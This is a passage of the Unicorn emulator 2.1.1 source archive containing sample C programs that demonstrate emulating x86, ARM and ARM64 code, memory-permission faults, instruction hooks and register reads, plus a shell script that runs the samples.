"faulting" : "non-faulting"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_READ | UC_PROT_EXEC); /* bits 32 page0: @0 times 4091 inc eax jmp page2 page1: @1000 times 4095 inc eax (or INC ECX) hlt page2: @2000 jmp page1 */ memset(code_buf, 0x40, sizeof(code_buf)); // fill with inc eax memcpy(code_buf + 0x1000 - 5, "\xe9\x00\x10\x00\x00", 5); // jump to 0x102000 memcpy(code_buf + 0x2000, "\xe9\xfb\xef\xff\xff", 5); // jump to 0x101000 code_buf[0x1fff] = 0xf4; // hlt if (cause_fault) { // insert instruction to trigger U_PROT_EXEC change (see hook_code // function) code_buf[0x1000] = 0x41; // inc ecx at page1 } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, sizeof(code_buf))) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); printf("FAILED EXECUTION\n"); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void nx_test(void) { printf("NX demo - step 1: show that code runs to completion\n"); do_nx_demo(false); printf("NX demo - step 2: show that code fails without UC_PROT_EXEC\n"); do_nx_demo(true); } static const uint8_t WRITE_DEMO[] = "\x90\xc7\x05\x00\x20\x10\x00\x78\x56\x34\x12\xc7\x05\xfc\x0f\x10" "\x00\x78\x56\x34\x12\xc7\x05\x00\x10\x10\x00\x21\x43\x65\x87"; static void do_perms_demo(bool change_perms) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of manipulating memory permissions\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_ALL); /* bits 32 nop mov dword [0x102000], 0x12345678 mov dword [0x100ffc], 0x12345678 mov dword [0x101000], 0x87654321 ; crashing case crashes here times 1000 nop hlt */ memcpy(code_buf, WRITE_DEMO, sizeof(WRITE_DEMO) - 1); memset(code_buf + sizeof(WRITE_DEMO) - 1, 0x90, 1000); code_buf[sizeof(WRITE_DEMO) - 1 + 1000] = 0xf4; // hlt if (change_perms) { // write protect memory area [0x101000, 0x101fff]. 
see hook_code // function code_buf[0] = 0x41; // inc ecx } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, sizeof(code_buf))) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("FAILED EXECUTION\n"); printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void perms_test(void) { printf("Permissions demo - step 1: show that area is writeable\n"); do_perms_demo(false); printf("Permissions demo - step 2: show that code fails when memory marked " "unwriteable\n"); do_perms_demo(true); } static void do_unmap_demo(bool do_unmap) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t code_buf[0x3000]; insts_executed = 0; printf("===================================\n"); printf("# Example of unmapping memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok - Failed on uc_open() with error returned: %u\n", err); return; } uc_mem_map(uc, 0x100000, 0x3000, UC_PROT_ALL); /* bits 32 nop mov dword [0x102000], 0x12345678 mov dword [0x100ffc], 0x12345678 mov dword [0x101000], 0x87654321 ; crashing case crashes here times 1000 nop hlt */ memcpy(code_buf, WRITE_DEMO, sizeof(WRITE_DEMO) - 1); memset(code_buf + sizeof(WRITE_DEMO) - 1, 0x90, 1000); code_buf[sizeof(WRITE_DEMO) - 1 + 1000] = 0xf4; // hlt if (do_unmap) { // unmap memory area [0x101000, 0x101fff]. 
see hook_code function code_buf[0] = 0x42; // inc edx (see hook_code function) } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, code_buf, 0x1000)) { printf("not ok - Failed to write emulation code to memory, quit!\n"); return; } // intercept code and invalid memory events if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK || uc_hook_add(uc, &trace1, UC_HOOK_MEM_INVALID, hook_mem_invalid, NULL, 1, 0) != UC_ERR_OK) { printf("not ok - Failed to install hooks\n"); return; } // emulate machine code until told to stop by hook_code printf("BEGINNING EXECUTION\n"); err = uc_emu_start(uc, 0x100000, 0x103000, 0, 0); if (err != UC_ERR_OK) { printf("FAILED EXECUTION\n"); printf("not ok - Failure on uc_emu_start() with error %u: %s\n", err, uc_strerror(err)); } else { printf("SUCCESSFUL EXECUTION\n"); } printf("Executed %d instructions\n\n", insts_executed); uc_close(uc); } static void unmap_test(void) { printf("Unmap demo - step 1: show that area is writeable\n"); do_unmap_demo(false); printf( "Unmap demo - step 2: show that code fails when memory is unmapped\n"); do_unmap_demo(true); } int main(int argc, char **argv, char **envp) { nx_test(); perms_test(); unmap_test(); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_all.sh�����������������������������������������������������������������0000775�0000000�0000000�00000002513�14675241067�0017321�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh [ -z "${UNAME}" ] && UNAME=$(uname) DIR=`dirname $0` if [ "$UNAME" = Darwin ]; then export DYLD_LIBRARY_PATH=. else export LD_LIBRARY_PATH=. 
fi if test -e $DIR/sample_x86; then echo "==========================" $DIR/sample_x86 -32 echo "==========================" $DIR/sample_x86 -64 echo "==========================" $DIR/sample_x86 -16 echo "==========================" $DIR/shellcode -32 echo "==========================" $DIR/mem_apis fi if test -e $DIR/sample_arm; then echo "==========================" $DIR/sample_arm fi if test -e $DIR/sample_arm64; then echo "==========================" $DIR/sample_arm64 fi if test -e $DIR/sample_mips; then echo "==========================" $DIR/sample_mips fi if test -e $DIR/sample_sparc; then echo "==========================" $DIR/sample_sparc fi if test -e $DIR/sample_m68k; then echo "==========================" $DIR/sample_m68k fi if test -e $DIR/mem_apis; then echo "==========================" $DIR/mem_apis fi if test -e $DIR/sample_batch_reg; then echo "==========================" $DIR/sample_batch_reg fi if test -e $DIR/sample_x86_32_gdt_and_seg_regs; then echo "==========================" $DIR/sample_x86_32_gdt_and_seg_regs fi if test -e $DIR/sample_mmu; then echo "==========================" $DIR/sample_mmu fi �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_arm.c������������������������������������������������������������������0000664�0000000�0000000�00000031713�14675241067�0017141�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated // #define ARM_CODE "\x37\x00\xa0\xe3" // mov r0, #0x37 #define ARM_CODE "\x00\xf0\x20\xe3" // nop // #define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, // r2, r3 #define THUMB_CODE "\x83\xb0" // sub sp, #0xc #define ARM_THUM_COND_CODE \ "\x9a\x42\x14\xbf\x68\x22\x4d\x22" // 'cmp r2, r3\nit ne\nmov r2, #0x68\nmov // r2, #0x4d' // code to be emulated #define ARM_CODE_EB \ "\xe3\xa0\x00\x37\xe0\x42\x10\x03" // mov r0, #0x37; sub r1, r2, r3 #define THUMB_CODE_EB "\xb0\x83" // sub sp, #0xc // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R1 register int r3 = 0x3333; // R2 register int r1; // R1 register printf("Emulate ARM code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, 
ARM_CODE, sizeof(ARM_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // SP register printf("Emulate THUMB code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(THUMB_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } static void test_armeb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R2 register int r3 = 0x3333; // R3 register int r1; // R1 register printf("Emulate ARM Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM_CODE_EB, sizeof(ARM_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code.
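/*
 * Editor's aside (not in the original sample): the last two uc_emu_start()
 * arguments are a timeout in microseconds and an instruction-count limit,
 * with 0 meaning "unlimited" for both. A minimal single-stepping sketch of
 * the same code, mirroring the stepping loop used in test_thumb_ite_internal
 * later in this file:
 *
 *   uint32_t pc = ADDRESS;
 *   while (pc < ADDRESS + sizeof(ARM_CODE_EB) - 1) {
 *       // count = 1: execute exactly one instruction, then return
 *       if (uc_emu_start(uc, pc, ADDRESS + sizeof(ARM_CODE_EB) - 1, 0, 1))
 *           break;
 *       uc_reg_read(uc, UC_ARM_REG_PC, &pc);
 *   }
 */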
err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumbeb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // SP register printf("Emulate THUMB Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE_EB, sizeof(THUMB_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(THUMB_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } static void test_thumb_mrs(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int pc; printf("Emulate THUMB MRS instruction\n"); // 0xf3ef8014 - mrs r0, control // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // Setup the cpu model. err = uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_M33); if (err) { printf("Failed on uc_ctl() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, "\xef\xf3\x14\x80", 4); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + 4, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done.
Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_PC, &pc); printf(">>> PC = 0x%x\n", pc); if (pc != ADDRESS + 4) { printf("Error, PC was 0x%x, expected was 0x%x.\n", pc, ADDRESS + 4); } uc_close(uc); } static void test_thumb_ite_internal(bool step, uint32_t *r2_out, uint32_t *r3_out) { uc_engine *uc; uc_err err; uint32_t sp = 0x1234; uint32_t r2 = 0, r3 = 1; err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc_mem_write(uc, ADDRESS, ARM_THUM_COND_CODE, sizeof(ARM_THUM_COND_CODE) - 1); uc_reg_write(uc, UC_ARM_REG_SP, &sp); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); if (!step) { err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(ARM_THUM_COND_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } } else { int i, addr = ADDRESS; for (i = 0; i < sizeof(ARM_THUM_COND_CODE) / 2; i++) { err = uc_emu_start(uc, addr | 1, ADDRESS + sizeof(ARM_THUM_COND_CODE) - 1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_ARM_REG_PC, &addr); } } uc_reg_read(uc, UC_ARM_REG_R2, &r2); uc_reg_read(uc, UC_ARM_REG_R3, &r3); uc_close(uc); *r2_out = r2; *r3_out = r3; } static void test_thumb_ite(void) { uint32_t r2, r3; uint32_t step_r2, step_r3; printf("Emulate a THUMB ITE block as a whole or per instruction.\n"); // Run once. printf("Running the entire binary.\n"); test_thumb_ite_internal(false, &r2, &r3); printf(">>> R2: %d\n", r2); printf(">>> R3: %d\n\n", r3); // Step each instruction. printf("Running the binary one instruction at a time.\n"); test_thumb_ite_internal(true, &step_r2, &step_r3); printf(">>> R2: %d\n", step_r2); printf(">>> R3: %d\n\n", step_r3); if (step_r2 != r2 || step_r3 != r3) { printf("Failed with ARM ITE blocks stepping!\n"); } } static void test_read_sctlr(void) { uc_engine *uc; uc_err err; uc_arm_cp_reg reg; printf("Read the SCTLR register.\n"); err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); } // SCTLR. See arm reference.
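/*
 * Editor's aside (not in the original sample): the uc_arm_cp_reg fields
 * mirror the MRC operand encoding "MRC p<cp>, <opc1>, Rt, c<crn>, c<crm>,
 * <opc2>"; SCTLR is "MRC p15, 0, Rt, c1, c0, 0", which gives the values
 * below. Any other cp15 register is reached the same way, e.g. a hedged
 * sketch for MIDR ("MRC p15, 0, Rt, c0, c0, 0"):
 *
 *   uc_arm_cp_reg midr = {0};
 *   midr.cp = 15;  // crn/crm/opc1/opc2 stay 0, which selects MIDR
 *   if (uc_reg_read(uc, UC_ARM_REG_CP_REG, &midr) == UC_ERR_OK)
 *       printf("MIDR = 0x%" PRIx32 "\n", (uint32_t)midr.val);
 */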
reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; err = uc_reg_read(uc, UC_ARM_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR = 0x%" PRIx32 "\n", (uint32_t)reg.val); printf(">>> SCTLR.IE = %" PRId32 "\n", (uint32_t)((reg.val >> 31) & 1)); printf(">>> SCTLR.B = %" PRId32 "\n", (uint32_t)((reg.val >> 7) & 1)); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm(); printf("==========================\n"); test_thumb(); printf("==========================\n"); test_armeb(); printf("==========================\n"); test_thumbeb(); printf("==========================\n"); test_thumb_mrs(); printf("==========================\n"); test_thumb_ite(); printf("==========================\n"); test_read_sctlr(); return 0; } �����������������������������������������������������unicorn-2.1.1/samples/sample_arm64.c����������������������������������������������������������������0000664�0000000�0000000�00000027045�14675241067�0017316�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM64 code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define ARM64_CODE \ "\xab\x05\x00\xb8\xaf\x05\x40\x38" // str w11, [x13], #0; ldrb w15, [x13], // #0 // #define ARM64_CODE_EB "\xb8\x00\x05\xab\x38\x40\x05\xaf" // str w11, [x13]; // ldrb w15, [x13] #define ARM64_CODE_EB ARM64_CODE // mrs x2, tpidrro_el0 #define ARM64_MRS_CODE "\x62\xd0\x3b\xd5" // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm64_mem_fetch(void) { uc_engine *uc; uc_err err; uint64_t x1, sp, x0; // msr x0, CurrentEL unsigned char shellcode0[4] = {64, 66, 56, 213}; // .text:00000000004002C0 LDR X1, [SP,#arg_0] unsigned char shellcode[4] = {0xE1, 0x03, 0x40, 0xF9}; unsigned shellcode_address = 0x4002C0; uint64_t data_address = 0x10000000000000; printf(">>> Emulate ARM64 fetching stack data from high address %" PRIx64 "\n", data_address); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } uc_mem_map(uc, data_address, 0x30000, UC_PROT_ALL); uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_ALL); sp = data_address; uc_reg_write(uc, UC_ARM64_REG_SP, &sp); uc_mem_write(uc, data_address, "\xc8\xc8\xc8\xc8\xc8\xc8\xc8\xc8", 8); uc_mem_write(uc, shellcode_address, shellcode0, 4); uc_mem_write(uc, shellcode_address + 4, shellcode, 4); err = uc_emu_start(uc, shellcode_address, shellcode_address + 4, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } x0 = 0; uc_reg_read(uc, UC_ARM64_REG_X0, &x0); printf(">>> x0(Exception Level)=%" PRIx64 "\n", 
x0 >> 2); err = uc_emu_start(uc, shellcode_address + 4, shellcode_address + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_ARM64_REG_X1, &x1); printf(">>> X1 = 0x%" PRIx64 "\n", x1); uc_close(uc); } static void test_arm64(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int64_t x11 = 0x12345678; // X11 register int64_t x13 = 0x10000 + 0x8; // X13 register int64_t x15 = 0x33; // X15 register printf("Emulate ARM64 code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM64_CODE, sizeof(ARM64_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM64_REG_X11, &x11); uc_reg_write(uc, UC_ARM64_REG_X13, &x13); uc_reg_write(uc, UC_ARM64_REG_X15, &x15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); printf(">>> As little endian, X15 should be 0x78:\n"); uc_reg_read(uc, UC_ARM64_REG_X15, &x15); printf(">>> X15 = 0x%" PRIx64 "\n", x15); uc_close(uc); } static void test_arm64eb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int64_t x11 = 0x12345678; // X11 register int64_t x13 = 0x10000 + 0x8; // X13 register int64_t x15 = 0x33; // X15 register printf("Emulate ARM64 Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM64_CODE_EB, sizeof(ARM64_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM64_REG_X11, &x11); uc_reg_write(uc, UC_ARM64_REG_X13, &x13); uc_reg_write(uc, UC_ARM64_REG_X15, &x15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); printf(">>> As big endian, X15 should be 0x78:\n"); uc_reg_read(uc, UC_ARM64_REG_X15, &x15); printf(">>> X15 = 0x%" PRIx64 "\n", x15); uc_close(uc); } static void test_arm64_sctlr(void) { uc_engine *uc; uc_err err; uc_arm64_cp_reg reg; printf("Read the SCTLR register.\n"); err = uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); } // SCTLR_EL1. See arm reference. reg.crn = 1; reg.crm = 0; reg.op0 = 0b11; reg.op1 = 0; reg.op2 = 0; err = uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR_EL1 = 0x%" PRIx64 "\n", reg.val); reg.op1 = 0b100; err = uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR_EL2 = 0x%" PRIx64 "\n", reg.val); uc_close(uc); } static uint32_t hook_mrs(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg, void *user_data) { uint64_t r_x2 = 0x114514; printf(">>> Hook MSR instruction. Write 0x114514 to X2.\n"); uc_reg_write(uc, reg, &r_x2); // Skip return 1; } static void test_arm64_hook_mrs(void) { uc_engine *uc; uc_err err; uint64_t r_x2; uc_hook hk; printf("Hook MRS instruction.\n"); err = uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); } err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); if (err != UC_ERR_OK) { printf("Failed on uc_mem_map() with error returned: %u\n", err); } err = uc_mem_write(uc, 0x1000, ARM64_MRS_CODE, sizeof(ARM64_MRS_CODE)); if (err != UC_ERR_OK) { printf("Failed on uc_mem_write() with error returned: %u\n", err); } err = uc_hook_add(uc, &hk, UC_HOOK_INSN, hook_mrs, NULL, 1, 0, UC_ARM64_INS_MRS); if (err != UC_ERR_OK) { printf("Failed on uc_hook_add() with error returned: %u\n", err); } err = uc_emu_start(uc, 0x1000, 0x1000 + sizeof(ARM64_MRS_CODE) - 1, 0, 0); if (err != UC_ERR_OK) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } err = uc_reg_read(uc, UC_ARM64_REG_X2, &r_x2); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> X2 = 0x%" PRIx64 "\n", r_x2); uc_close(uc); } #define CHECK(x) \ do { \ if ((x) != UC_ERR_OK) { \ 